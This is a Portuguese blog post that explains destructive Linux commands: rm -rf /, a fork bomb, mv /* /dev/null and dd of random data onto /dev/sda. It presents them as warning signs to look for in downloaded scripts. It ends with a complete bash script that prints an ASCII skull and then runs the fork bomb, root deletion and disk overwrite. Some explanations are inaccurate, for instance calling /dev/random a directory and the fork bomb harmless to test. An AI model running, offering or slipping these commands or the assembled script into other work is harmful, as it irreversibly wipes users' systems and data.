COMO DESTRUIR O SISTEMA LINUX COM APENAS UM SCRIPT

   Olá pessoal . Hoje resolvi escrever sobre algo que me chamou muita atenção ,  5 comandos  que podem destruir o seu sistema ,vou falar um pouco eles , e no final vamos montar um script para que você possa saber interpretar quando vier a ver tais comandos em um script , antes de executar na sua máquina . E esses comandos podem destruir o seu sistema linux então fique atento ao que irei mostrar logo em seguida.



   Vamos aos comandos :

rm -rf /


:(){:|:&};:


mv /* /dev/null


dd if=/dev/random of=/dev/sda


rm -rf oculto



RM -rf /

   Esse nosso   é conhecido,  ele remove as arquivos .Usado com a chave r ele apaga tudo que existe dentro da pasta,ao contrário do rmdir que só apaga se o diretório estiver vazio e a chave f ele força a exclusão de todo o diretório sem perguntas ao usuário e seguido de / ele remove todo o seu diretório raiz, ai já poderíamos dá adeus  o linux.


   Mas vamos para o próximo.


 :(){:|:&};:


   Você deve estar se perguntando o que é isso?  Isso é uma bomba de fork ele define uma função  chamada ' : ' a qual chama a si mesma duas vezes , uma em foreground e outra em background , e cada uma repete o processo ate travar o pc totalmente , esse comando não é destrutivo , você pode testar-lo na sua máquina sem problemas , é só reiniciar-la que volta tudo ao normal .


   mv /* /dev/null
                     

   Esse move o diretório raiz para um " BURACO NEGRO " que tem no  linux que o diretório /dev/null todo arquivo que cair ai desaparece completamente da existência do universo ou cai no filme INTERESTELAR.


dd if=/dev/random of=/dev/sda

   Bom o diretório / dev/random  é um diretório de gravações de dados aleatórios do sistema e o que esse comando esta a fazer é pegar o dispositivo de entrada  que é o device de  dados aleatórios e gravando em cima do hd principal ou seja ele  formata , até ai tudo bem com algumas ferramentas é possível recuperar algumas coisas mas o ato de  gravação do diretório de dados aleatórios em cima torna impossível a recuperação de dados .


rm -rf oculto


   E o ultimo da lista , porém não menos importante, bom nem irei digitar porque é muito grande ,



COMO DESTRUIR O SISTEMA LINUX COM APENAS UM SCRIPT



   esse é o mesmo "rm -rf "só  que na forma hexadecimal, então quando baixarem algum script abram e leiam para ver se não há nenhum desses comandos .


VAMOS AO  SCRIPT


#!/bin/bash
#Uma caveira pra da um ar de já era.
echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´´´´¶¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´´´´´´´´´´´´´´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¶´´´´´´¶¶´´´´´¢´´´´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´´´´´´´¶´´´´´´¶¶´´¶´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¶´´¶´¢´´´´´¶´´´´¶´´´¢¢¢¢¢¢´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´¢´¶´´´´´´´´´¶´´´´¢´´¶¶´¢¶¶¶¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´¶´¶´¶¶´´´´´´´´´´¢¢¶´¶¶¶¢´¶´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´´´´´´´´´´´´´´´´´´´´¶´´¶¢¢´´¶¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´´´´¶¢´´´´´´´´´´´´´¶´´´¶´¶´´¶¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´´¶´´´´´´´´´´´¢¢¶¢¶´´´´´´´´´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´´¢¶¢¢¢¢¢¢¢´´´¢¢¢¶¢¢¢¶´´´´¶¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´´¢¢¢¢¢¶¢¢´´¶´´¢¢¢¢¢¢¢¢´´¶¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´¢¢¢¢¢¢¢´´´´´´¶¢¢¢¢¢¢¢´´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´¢¢¢¢¢´´´´¶¢´´´´¶¢¢¢¢¶´´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´´´´´´´´´´´¢¢¢´´¶´´´´´´´´´¶¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´´´´´´´´´¢´¢¢¢¶´´´´´´´´´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´¢¢¶´´´´¢¢¢¢¢´´´´¢¢¢¶¶¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´¶´´´´´´´´¶¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢´¶¶¶¢¢¢¢¢¢¢¢¢¢´¶¢¶¶¢¢¢¢¢´´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢´´´´´¢¢¢¢¢¢¢¢¢¢´´´´´´´´´¢¢¢¢¢¢¢¢¢¶´´´´´¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¶´´´´´´´´´¶¢¢¢¢¢¢¢¢¢¢¢¢´¢¢¢¢¢¢¢¶´´´´´´´´´´¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢´´´¶¢´´´´´´´´´¶¢¢¢¢¢¢¢¢¢¢´´´´´´´´´´´´´¶¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¶¶¶´´´´´´´¶¶´¶´´´´´´¶¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´¢¢¢¢´´´´´´´´´´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´´´´´´´¢¢¢´¢´´´´´´´¶¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¶´´´´´´´´´´´´¢¢¢¢¢¢¢¢¢¢¢¢¢´´´´´´´´´´´´´¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢´´´´´´´´´´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´´´´´´´´´¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢´´´´´´´´¶¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¶´¶´´´¶¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢´´´´´´´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢´´´´´¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¶¶´¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"

echo "¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢¢"


  :(){:|:&};:  ;

   rm -rf /  ;

dd if=/dev/random of=/dev/sda ;

Até mais.

Veja mais:

Comentários :

Postar um comentário